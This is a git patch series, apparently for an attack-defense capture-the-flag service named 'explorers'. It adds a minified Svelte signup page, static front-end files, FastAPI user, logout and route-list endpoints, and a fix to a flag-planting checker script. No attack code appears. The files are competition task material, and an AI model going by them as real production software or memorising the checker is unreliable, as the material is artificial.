is-centered"),e(t,"class","section")},m(n,E){x(n,a,E),c&&c.m(a,null),x(n,d,E),x(n,t,E),s(t,r),s(t,m),s(t,v),s(v,_),s(_,u),s(u,y),s(y,g),s(g,w),s(g,A),s(g,D),ee(I,D,null),s(u,H),s(u,L),s(L,$),s($,P),s($,j),s($,b),ee(S,b,null),s(u,B),s(u,T),M=!0,F||(R=le(u,"submit",ie(h[1])),F=!0)},p(n,[E]){n[0]?c?c.p(n,E):(c=ne(n),c.c(),c.m(a,null)):c&&(c.d(1),c=null)},i(n){M||(te(I.$$.fragment,n),te(S.$$.fragment,n),M=!0)},o(n){se(I.$$.fragment,n),se(S.$$.fragment,n),M=!1},d(n){n&&(o(a),o(d),o(t)),c&&c.d(),ae(I),ae(S),F=!1,R()}}}function $e(h,a,d){let t;async function r(p){const m=new FormData(p.currentTarget);let v=m.get("username"),_=m.get("password");try{const u=await fetch(`${_e}/signup`,{method:"POST",headers:{"Content-Type":"application/json"},credentials:"include",body:JSON.stringify({username:v,password:_})});if(u.ok){await pe("/",{invalidateAll:!0});return}d(0,t=await u.text());try{d(0,t=JSON.parse(t).detail.error)}catch{}}catch(u){d(0,t=u.toString())}await me()}return[t,r]}class Se extends ue{constructor(a){super(),fe(this,a,$e,ge,re,{})}}export{Se as component}; diff --git a/services/explorers/front/build/_app/immutable/nodes/7.1ca30cae.js b/services/explorers/front/build/_app/immutable/nodes/7.1ca30cae.js new file mode 100644 index 0000000..aaaadd6 --- /dev/null +++ b/services/explorers/front/build/_app/immutable/nodes/7.1ca30cae.js @@ -0,0 +1 @@ +import{s as re,f as l,a as N,g as i,h as f,d as o,c as V,u as X,j as e,i as x,v as s,H as le,M as ie,l as oe,m as ce,n as de}from"../chunks/scheduler.1f572272.js";import{S as ue,i as fe,b as Y,d as Z,m as ee,a as te,t as se,e as ae}from"../chunks/index.b942bf85.js";import{g as pe,i as me}from"../chunks/navigation.872e8737.js";import{P as he,L as ve}from"../chunks/LockClosed.36d30438.js";import{P as _e}from"../chunks/public.aa8ed6af.js";function ne(h){let a,d,t;return{c(){a=l("div"),d=l("div"),t=oe(h[0]),this.h()},l(r){a=i(r,"DIV",{class:!0});var p=f(a);d=i(p,"DIV",{class:!0});var m=f(d);t=ce(m,h[0]),m.forEach(o),p.forEach(o),this.h()},h(){e(d,"class","notification is-danger"),e(a,"class","container")},m(r,p){x(r,a,p),s(a,d),s(d,t)},p(r,p){p&1&&de(t,r[0])},d(r){r&&o(a)}}}function ge(h){let a,d,t,r,p='

Let's signup.

',m,v,_,u,y,g,w,A,D,I,H,L,$,P,j,b,S,B,T,J='

',M,F,R,c=h[0]&&ne(h);return I=new he({}),S=new ve({}),{c(){a=l("section"),c&&c.c(),d=N(),t=l("section"),r=l("div"),r.innerHTML=p,m=N(),v=l("div"),_=l("div"),u=l("form"),y=l("div"),g=l("p"),w=l("input"),A=N(),D=l("span"),Y(I.$$.fragment),H=N(),L=l("div"),$=l("p"),P=l("input"),j=N(),b=l("span"),Y(S.$$.fragment),B=N(),T=l("div"),T.innerHTML=J,this.h()},l(n){a=i(n,"SECTION",{class:!0});var E=f(a);c&&c.l(E),E.forEach(o),d=V(n),t=i(n,"SECTION",{class:!0});var O=f(t);r=i(O,"DIV",{class:!0,"data-svelte-h":!0}),X(r)!=="svelte-13w7eoo"&&(r.innerHTML=p),m=V(O),v=i(O,"DIV",{class:!0});var q=f(v);_=i(q,"DIV",{class:!0});var z=f(_);u=i(z,"FORM",{});var C=f(u);y=i(C,"DIV",{class:!0});var G=f(y);g=i(G,"P",{class:!0});var U=f(g);w=i(U,"INPUT",{class:!0,name:!0,type:!0,placeholder:!0}),A=V(U),D=i(U,"SPAN",{class:!0});var K=f(D);Z(I.$$.fragment,K),K.forEach(o),U.forEach(o),G.forEach(o),H=V(C),L=i(C,"DIV",{class:!0});var Q=f(L);$=i(Q,"P",{class:!0});var k=f($);P=i(k,"INPUT",{class:!0,name:!0,type:!0,placeholder:!0}),j=V(k),b=i(k,"SPAN",{class:!0});var W=f(b);Z(S.$$.fragment,W),W.forEach(o),k.forEach(o),Q.forEach(o),B=V(C),T=i(C,"DIV",{class:!0,"data-svelte-h":!0}),X(T)!=="svelte-1w4lgya"&&(T.innerHTML=J),C.forEach(o),z.forEach(o),q.forEach(o),O.forEach(o),this.h()},h(){e(a,"class","section"),e(r,"class","columns is-centered"),e(w,"class","input"),e(w,"name","username"),e(w,"type","text"),e(w,"placeholder","Username"),e(D,"class","icon is-small is-left"),e(g,"class","control has-icons-left has-icons-right"),e(y,"class","field"),e(P,"class","input"),e(P,"name","password"),e(P,"type","password"),e(P,"placeholder","Password"),e(b,"class","icon is-small is-left"),e($,"class","control has-icons-left"),e(L,"class","field"),e(T,"class","field"),e(_,"class","column is-half has-text-centered"),e(v,"class","columns is-centered"),e(t,"class","section")},m(n,E){x(n,a,E),c&&c.m(a,null),x(n,d,E),x(n,t,E),s(t,r),s(t,m),s(t,v),s(v,_),s(_,u),s(u,y),s(y,g),s(g,w),s(g,A),s(g,D),ee(I,D,null),s(u,H),s(u,L),s(L,$),s($,P),s($,j),s($,b),ee(S,b,null),s(u,B),s(u,T),M=!0,F||(R=le(u,"submit",ie(h[1])),F=!0)},p(n,[E]){n[0]?c?c.p(n,E):(c=ne(n),c.c(),c.m(a,null)):c&&(c.d(1),c=null)},i(n){M||(te(I.$$.fragment,n),te(S.$$.fragment,n),M=!0)},o(n){se(I.$$.fragment,n),se(S.$$.fragment,n),M=!1},d(n){n&&(o(a),o(d),o(t)),c&&c.d(),ae(I),ae(S),F=!1,R()}}}function $e(h,a,d){let t;async function r(p){const m=new FormData(p.currentTarget);let v=m.get("username"),_=m.get("password");try{const u=await fetch(`${_e}/signup`,{method:"POST",headers:{"Content-Type":"application/json"},credentials:"include",body:JSON.stringify({username:v,password:_})});if(u.ok){await pe("/",{invalidateAll:!0});return}d(0,t=await u.text());try{d(0,t=JSON.parse(t).detail.error)}catch{}}catch(u){d(0,t=u.toString())}await me()}return[t,r]}class Se extends ue{constructor(a){super(),fe(this,a,$e,ge,re,{})}}export{Se as component}; diff --git a/services/explorers/front/build/_app/version.json b/services/explorers/front/build/_app/version.json new file mode 100644 index 0000000..ff8541f --- /dev/null +++ b/services/explorers/front/build/_app/version.json @@ -0,0 +1 @@ +{"version":"1701826847895"} \ No newline at end of file diff --git a/services/explorers/front/build/favicon.png b/services/explorers/front/build/favicon.png new file mode 100644 index 0000000000000000000000000000000000000000..0c63270815273db9053781a6fb78f107bc1c80ed GIT binary patch literal 9167 zcmZvC1yCGK)a~M~AwbaJ!QI`R;4Hymad&rj4eoBiE$HIzf#6v@1V|Ql`1h;7>Q%jZ zucmsst9wpOSI_Nx&pkb{>T2>>=p^U>002u-K}Hi+hx}Jikzw~?F|%n{_0d8>QxyR4 zqlfiJ0058wjsFG!JUIY>Kc)bHP&NQS%1CPaY@8Q(`;e{l-HCHEpV#WA zu}-$o8nm$Jf#3feG1Urd4(CLpnhexZ==(k?jqa@Amd>ALh#yA9S(CDWFSUWB(!fc@ zL+T=(nULt8>QJ|yMpu_*q_}zXvfqi{!%cHu-^PR-_;OY@?rt?#D0<9)oNw|(5&4_? zLpB-R0C{=>V=kt_?HXYU5@_xzkzGUld9~O8Y z+!)%O`nT;4pBgXZ5G-fv8O&cXI_|FTClue>k}b>`Uc<;(PB)THOsbqvyLa>C>LMe0w{ChwtKx{s#jkB|&Yy=%4@o)rr0bd#BP(>>+YR z_2a4mv?1}}ml!5%A0I_8J`?@6kQ;8Rl+^4`NE?7Lx{tUwY7Fd!V#8(s$Ur8lswOmB z5i^LN0YP;poX9i|FBy#BtPoX++I|jh&eVT_rbu}W1DSP~mkJ4qax|-N%5AfPCOe0IG#tcB^ zNu-SquXC?z5@3!`8>64=>^%MF2B1Wo!h0GdMh@vmG!=w?N~vJ)^1NlCFzQT-T-RTu z^m(UJz)^Twb)>PqIu{#-9Ox?2gt$(ii(^0ECvQp*$N|%U;R6S&8oR=xSGOe8+%B6i z#Q?c-b^#(kj}A3YJ=_lVWM9Z@B;cUv5VHOTe`g7H0234e!u?3$MYxt3a|AdZ+NFknamFki1v)>x^->ttA?HY%|Q9qbSFU8_l{eF zcI}*HcB-y%q6S4qlD|71P`o2`8)P{#R_*y2v{!LXa zYX(*$qb_)1KbU!y$~kSTsw$ZJ*)cWdvo71Cpn(M-vLoMlkTFni*Nnn_uKh{?-YorT zE56?$oz+e#JJ3HJd|ukR&2_bL@363b^a!~=^{zQ`f@nv$g;^6IL*-;*av@kF!keByy$vR}7 z>qx01qL9v13~C}_{#i1i)@^=8ubGQ|{<8S2uHmSTePC!G1;=&qPzvKJztZ+ckD&v5 zqv>1Z7ptlYPC>eL&EfRDy(UI<_5#6p@oRss(4Qd~G~3^^;QbIGSKvoTm~1+|>wIn9 z$Pf{B+)zggSO5K8@F9z!x`lDxUJm~Z)P1iFAuKPZHrD3^ANs#GSu%PLk zi}z6l>U*^PZetT@sy_EO)yX(1S5ICO{|B8p9{xMeEEKd$0iyd;&Ylw$cWx8^L!G#~ zx?y{aTsb*&>du*5OI<(m6rQjbzex#M^LsXo{%k_Zd93Bi$Y7zSqu{qh@<6O08YnGP z5v1OL{rm!gbW4_qZ*I-t>}*N)E!!$u8p5`4n~(Iu!eK}xB?t0*ji;qBcH_d-x%xJ= z%+*(Ma>1#jDW%rZK=61dJHi_VnY7{earn14x8i`J*Fk<}Cf`33i_mXBd8{fbT=k=< z_~^*9g-b>KVSi+y)R4V5NL;wKc7cVsxU#Yw*ZGHT%R)}uxM@Tj+Y$pOpDv${+3Fj1XI{G8 zT|Elt=wl3KKiHjWV{kG`PH4;QOfXl@Pf7$$4o<<0rCfwX+rv3_+X|!ci5Z>TiT{R8 z8rPazoeSKNfn4}cHhemA`5e0klXh%uujzx;lMgryZ~q1B{kBjI6FMJ;8cE}?&zoSEEQz1yT7+5o}W7Nb<_ta_`0`Lmva1jJ!{VT$ZgFb6j@fPLv5 zzCzpP@L&0SCmg4JhaZ#K(w|`SKW$jv&qPe*ICV^K1~;LEvKssV!7!p=KV)S!qtw>^s`LH3)l+01TDmAGY~^>p z250EwH^fBkwzj21-WdQ9@w*V%?DhwVcp$*QKp*a=%4Q+xZCW1lnGb3$V4-q;PHoz)N+3D@w`W7~bbS}-XX2B7SekR}I?C)Ay5}Gz9r@Yg( zc|3cVTjOgbtDO2fe>^mqy5pfHbbwNJsk;zuizv*#^5|mSmoPxEb_ix*+~L{?E+85I zTl`S;d^wvhev51ClXaGdyG7Xd2mHpZxhMPMdE2Q`hTaVh}C(R}Y-)tJCA; zW@Rm{hV*m{41VWBs96&a9go?fy6KmJKKEmq0!h2NW&G}A8%$|avz3V>@~UFAfi&3(k%#(IX^g`AA8E-gC<>I}W* z_>Y27*hxN&#tmg^(K)b+I_f^6$a%Acz#qU*L@Y__==_z0c^{~-aH<5dC3i?s`b_-Ge5BNmZttPq9FY6j#OskehWq#u z5?_(1TAwYFvvpB3ER0dj zV&AWYex`DMzJ7ITt6}Nu&v`-}RyX-iLIHViKANi`+vNvEuZPKp)5ViNzCAfYWMJ0T$fw+m`# zZS9t_mblj0*}xBL=pnzTo;r()-7jvbjaB}>JZjV1Bi2W0M*{#)d?bT4v+I>_vNs}RQDPD zclJh?t*>R(Ai@bro#K?7qQPtRE^2-xcZPwycMZm)D_U0yiSg;3Y)eG)%P{bddmqAM zko)w^hl7f8_0=V*@M+7(l?h`I4p&rV6Mm0glnN_G7<(okUo$Opye(n60!>uyrJOI4 z_*U~W%hstaL{e^Nrznv{+Ws2JD=%?=E^qojZ=@<2O4}e)SHzQu*i$gNuD_L1^f_8S z%|nH{3?s#KlONA67@;0D1P3q76R|nU%eU``r+~hAUx)xREq4aSL=5%u8s|+Y-5nkwZB>luB#}kRzL%I&&NEvnQ<)^DFP*FcQ-30 ztX%BokyOK%Rc8Y}iN6_DLIF)&hW5{nzQQKQW_o=W7#vjXk49UqEyrn3{I|khKZ)dA1jgL|MthiY}ZPg zsIKo{w))(OHm8`cWgWq9NZ2@f(YK+P5VH}$a=fdT@IddYpP1{zA&mtSj;WWQ(1#1O zUSo~WO`;ZAC5g7L!Fbp3vbkW5qzKQ*6va$F-sX?o={X-x!k;c`r>3jsUFQFaK8}T} zPl=376yZR54=^K*ZS@Eu|MTVinQR}j3p%5dvm70^QqC)#1rd1E31cpAMN_NfVl+?KB|sR zj<_o|iv8&)4Ao1G6nzLC{0B3H3#G3gqxoN$?jJ;t=dQ+wy*8#!^d07;xKbiQet)KfI#orDSFkT{YX{zz?EG)ez5vyWCXT(O) z1A&^%jxfdetoeLvYF4d)sx+*y3^LdS3B}Id7JXZJ7X3LXk;4W3t7e43r;#0_jkOV8 z-|s3U{A?{71d-D1?E(Hzr)^#z@HIQ&#HF%Egy1JIJ-(n)EuLQ;U9K=Uw(;FCqdOHP z50DFwkvH~_nIut^)qYDMHN9?ZENSk*;=Z&T+pJH_r%J<57df@6 z+d7iNGcvzVRt@l=No6`kGvBp2|2uYa(bQo2MTSYe^XD{<*BQurMKDm~9oJ1!o8kI` z899^^v5)87yLW3IFP{J0$nQ{OOWNz=d%XYd4S1hdc8j)D-^8;KHD-KW+}NJI%y&@k zAkxv9R8axh+t%#F=SI;Y77$~`YSNjTqUK!9^YH&C5oB4bwUO=g9crVIV%+UfEmmLkP;YgIA8cM$=DgDzy zlc|S*Haxf?gl}%4FX+pqM7*oz$j38K^sS=mrqUb*I%KM#!46C!FD)IFy?VH9;S(~Om}1swmoh62DSflq$iPZMqa+M-DQcEo-T6UIs_ZtwD^jGB<208h2Z?yujUj^dUv)znHOU-E_{Do1v)E#S7FC0P2lY)-uPGu4XX|yFfm3_Y}kPxNmJH?TM@0Q6KSp&AD4Ye-z z^cn9oaL#H3W=?#TY#avZ2lO1lJ30GMXVjO|a&yfl*gP`N(~QqVWfvqF_D&2x;XrVz z#exQkqH%hM&GsLH3qp_Q4elFuBM`RN5nP*_%Oiw2bu?_;duG%0Hi_>sJBf_E)O8H< zx`LlJG3`hgU9tBpu#|P(+Q?VuQN*ZxE+_E3iiA=4NPFfB_9urc56BH>3(1jUs6LTl zgV0=n3xhqq#v2LR!sjxtw|B*aMxf7mJ)11%Qy~Hdn9a44r`|FKfNl=ocv8cH=KyEU zDJnHi1t+(WDoOYo--Vkv^j9o%$%t2d_&bWA?_c zU-MM;DoI8@g@wL#E$>%U)Cr$;=Q(t8kN##*Ko;WwchsYb{EFW?0F6ajXz37q>FN2+ zvw^u0r37H3mS2ckK2&u?EyHB5r3oO!rx#~a?{`7n#Kp47?kf9LQ#VZNba(y} zn32O6PJoWod>5Q2wlooj8$BWwgs`n1{7JkhGAAAU>n-ZX=}m6M4}0)#34RD2DuPW{ zyAzTd=zOV(H;Dziq;-X|_S-vdFJkKi8ota%c4HN}u-)ri8OZp=t2NTtz9W9ht3UkY z6-KPYoPq)*iB4}X28;WJ8J!453bn0q0Sqpt95P6OR9Lb3u@TJoVxT~KlCWDD1cp@0 z;-3uaI~z)_o>*E#k+!xZ%vCB!2Fh73cXLKoZ0n!l?D1}s_hU*JkOZe)sk&(b0S<9P z1Zo8pm9-)A3om?4eAjlNlfOIyF}f&1d%>|giY7rL z4GVLSd8}%rI8=N<^89$_lBQD*FSo;WdTDKd#iTh*ro4*bTt@<>G-3oiHe%dg4j}~u zPMXIeq0#^-8ncd-l`e=^R;i2WH{ebEj3sv7`)=J9Y-Wr2a~*#!u(+BpEW7kkSgOV9 zBAV=oCG4Hp^uQL(f_jd~EsBP8KgYyBY9Th~JF&ALs~Z{lAoHryOzxWQ^VTWG#O`{d z?365r-KZtQ?6cqNkos@GU4;w(7oR7bpDWFMTe!NrlGWD%i(-20SnF%oa;SoP=K(?c zL_n`)%`{E?94>!!#t)2V!8ZUg=NN6Flp6LgMHexDcrdyMOSJSus`C+c@$F=|!u)Q8 zs>Z`rHS`TQW;HWC3>{eNuH15RbEnpi2-$?bQ8w~;nsi_1*XmeapKB;C+f(BB9}Xy+;IUiqK=AzqdEAa8p(It=x zvb;#FP`*E@)v3?TwHAF+(plHnpG@{T=gf1YfHw{uY}UycOmylzbMSQQKM)b*rVZ6@ zugPZ@Om6ioj*iD7IYB+01VO~{G+F9=2+ahG7TrslThmd{ZinWnfgm4Qyur$%- z_|h`Kbua*?3~DW{$*B4Z7Z|f&aB_l@Nyih=_HzWy;3q}B5bIuHJYe*2FLa1HPz|6! zcFZmM7TW>1&L>?{W;^`r(fVLL569uV3YyExw}yTGVaF}hjzyf*L4c|B+0kTRMj#U2 z>OYG>dV%o#U?@OR=;8L#tx&`*LO6@Hb*CF_N-s>tGBstc;nndVn#xs!3_VCKv$7u` zvnpZ9IPKQ^NuW~ES{6p3Yq%>j#(ac5Cn3Bt3?2o-- z-9p{hqyrSau`9;)(kCn&{@twK{nN}+ca;}55f-7-`dL znRXJifcz*#?Oc7OfQh^}Pnpk@b~Z8O#enQ8W@U*=&pJMMto2hv=@h;BD%*S~JNzla zvJ-Ecl27@zc6+Cd{c_(l`b6UHDKIlvOY-Y#Q)}7@J~&Wv1?tjh)8SB;M@c^%o$kuk z`%zNy>|2qU|BgM#NF^MZ>dO4MuiiHuIeu(C+xA?IYXyX58OQQHURRgvt&gQ_5P#I3 zIJn`JA>arfL}I7KN-k-G7jFF>;^|coWEuP>1Jol+>$%T?#P6SZy|$Q%l3LAo6mp3X zS2G!W{tC_c#-4qF@bX@fjgz+<^XJJ11t{E`4eCwn8)!69WBwR4K_OveqySMyO|opNj_R+>WH|q!Na}&A*o!WhTrT+aZ;_*qhmu-tsGAq z68=LJoL4~vAxOl-3t#XYEjiZWf3KJ9LJ!|R?=CEGY`$DTcl(FVf|H5CLwhgu09Vx6 zJh7=Gfj!y}EEKZiV<$g(g060ZcD}n%`L)7qU@j8l+3Hsi_r|@bLSZCbZxLcKL(8oN zz2*G7f_LB9sDo}ZA@Ro>8(jk~&P6qssY8ceR}yA;I%B=VgrGm2Dphwucp)mZO_xpy zNCJG^%2A{0mHPDCxNzI z2^RB46Unz7u&T^m8z-gIYg6vWxIh@&n!h7#g@u|^`GY?&<8pEUX=$W>NdIFNAwx}# z{$hh3f^gAcl8xWu>F0BO>uW+BB}98*>i$l(4m& ze^TScoJxxcWUO!G)B?JWDb?~SE%vAz7%Oewxc05Cj>g8oLUCN3%h#bk5qlB#_4tL~ z{RACpVjK%}V7&Xi#)VG#W-Q-fxj%+Qg}ot6w0vg5_-G<2y&;2;#u$JDYXAMnpfpVF zm~UUcd@@1T{z`6nD6+#}uw#O}+!cxrW(aLGCkwzbYw<&FPFUe|D-@^PLyDKPS}IZv-z1Y<=<>WALEcWn?is8?xc#w zMJgkWZ6C;M9{h)qTpB-hVNWs;=r8^>J2MhD^or5`>@`sH-J1wMhRa5V2{1WfTj1wF z&$TyvM?-?k?TY$v155F>xSN;Hk6wqQ<~l!E-CKeFG%}#WbO0+;j|x6&*bP!YZ!K;NfYisa~7e@=t-w_J5KthflG%oI#U&B^yvi(*eKyeylHVj#ZT% zZS(eQuCbw{ON>Hw(t~`rd1R#?!|}}$Xg3RfP{qAc2$C%Km{oMiAPlezXl#I0wJUr+HqE2pK?tM)Z`*-e_LkNZ zE6FrF4cj+Aj5dzOtlO>G#J)K?1?cvi);QbW`t-c+(4fj|{NNxyagyDsexp_@tdXRK zE6eLf(ON8cjxCSQ8I>;Qn(6r)ks(7rKQ;L8YX9!(;^|qXkT++9ApAB&@(&?Lve*q8fi!sHzEADW;cS(VD%qtM!zlsoxHf(+80+wp;$K$EuNtv z-iROv%1hmw1Ed440AILo6BMQfl!w-->wkJ+P12TF-f)aq?+CLE1Q~DzP$|QtrKGg6 ziAM2*D`v9eM@`mZhA*Asm_3BJQOd3gZ6TZqnDifW70SIr+Cl@?iRBpB^pzpRrO_1= zLFMep#iWzBGQ+$>=gfQy5Ro0XG`m4i>4gHwo`M~F+1nS(=!gX276sQLc_I68xDt$hDK0RI04 z%pAd~!vLTD&l@~!9WC8G%p6_*Uknf5|6-m_se56V5C37boUJ^(&D<;j-rnA9wodl$ c7G^G%Y|d`hd4EMnU=INlWz}RFq)fy92P;=*o&W#< literal 0 HcmV?d00001 diff --git a/services/explorers/front/build/index.html b/services/explorers/front/build/index.html new file mode 100644 index 0000000..cf0be2c --- /dev/null +++ b/services/explorers/front/build/index.html @@ -0,0 +1,35 @@ + + + + + + + + + + + + + + +
+ +
+ + diff --git a/services/explorers/front/build/robots.txt b/services/explorers/front/build/robots.txt new file mode 100644 index 0000000..e9e57dc --- /dev/null +++ b/services/explorers/front/build/robots.txt @@ -0,0 +1,3 @@ +# https://www.robotstxt.org/robotstxt.html +User-agent: * +Disallow: diff --git a/services/explorers/src/app/api.py b/services/explorers/src/app/api.py index 2bab195..6e53ae3 100644 --- a/services/explorers/src/app/api.py +++ b/services/explorers/src/app/api.py @@ -27,6 +27,12 @@ async def get_current_user(request: fastapi.Request) -> str: detail=json_error("Could not validate credentials"), ) + if not user_data: + raise fastapi.HTTPException( + status_code=fastapi.status.HTTP_401_UNAUTHORIZED, + detail=json_error("Could not validate credentials"), + ) + user_id = user_data.get('user_id') return user_id @@ -87,6 +93,23 @@ async def signin_handler(response: fastapi.Response, auth_req: dto.AuthRequest): return {'user_id': f'{user.id}', 'api_token': token} +@api.get('/user') +async def get_user(user_id: str = fastapi.Depends(get_current_user)): + user = await models.User.get(user_id) + if not user: + raise fastapi.HTTPException( + status_code=fastapi.status.HTTP_404_NOT_FOUND, + detail=json_error('user not found') + ) + return serializers.UserSerializer.serialize(user) + + +@api.post('/logout') +def logout_handler(response: fastapi.Response): + response.delete_cookie("Api-Token") + return {'status': 'ok'} + + @api.post('/route/create') async def route_create_handler(create_req: dto.CreateRouteRequest, user_id: str = fastapi.Depends(get_current_user)): route = models.Route(title=create_req.title, @@ -97,6 +120,12 @@ async def route_create_handler(create_req: dto.CreateRouteRequest, user_id: str return serialize_route(route) +@api.get('/route') +async def route_list(user_id: str = fastapi.Depends(get_current_user)): + routes = await models.Route.find(models.Route.user_id == user_id).to_list() + return [serialize_route(route) for route in routes] + + @api.get('/route/{route_id}') async def route_get(route_id: str, user_id: str = fastapi.Depends(get_current_user), token: str | None = None): route = await get_route_by_id(route_id) diff --git a/services/explorers/src/app/dto.py b/services/explorers/src/app/dto.py index d7f48fd..eebcae2 100644 --- a/services/explorers/src/app/dto.py +++ b/services/explorers/src/app/dto.py @@ -8,6 +8,11 @@ class AuthRequest(BaseModel): password: str +class User(BaseModel): + id: str + username: str + + class CreateRouteRequest(BaseModel): title: str description: str diff --git a/services/explorers/src/app/serializers.py b/services/explorers/src/app/serializers.py index 96bf05d..cf28d0b 100644 --- a/services/explorers/src/app/serializers.py +++ b/services/explorers/src/app/serializers.py @@ -2,6 +2,15 @@ from app import dto +class UserSerializer: + @staticmethod + def serialize(user: models.User) -> dto.User: + return dto.User( + id=f'{user.id}', + username=user.username, + ) + + class WaypointSerializer: @staticmethod def to_model(waypoint: dto.Waypoint) -> models.Waypoint: From 4293875f621f5c8352ac459fbd219649064ef083 Mon Sep 17 00:00:00 2001 From: jnovikov Date: Wed, 6 Dec 2023 11:13:18 +0000 Subject: [PATCH 4/4] Explorers: fix checker --- checkers/explorers/checker.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/checkers/explorers/checker.py b/checkers/explorers/checker.py index c618043..b5a36fd 100755 --- a/checkers/explorers/checker.py +++ b/checkers/explorers/checker.py @@ -163,7 +163,7 @@ def put(self, flag_id: str, flag: str, vuln: str): self.assert_eq(set(x.description for x in wpts), set(x.get('desc') for x in updated_gpx['waypoints']), 'Failed to upload gpx') - self.cquit(Status.OK, f"{u}:{p}:{route_id}") + self.cquit(Status.OK, route_id, f"{u}:{p}:{route_id}") def get(self, flag_id: str, flag: str, vuln: str): u, p, route_id = flag_id.split(':')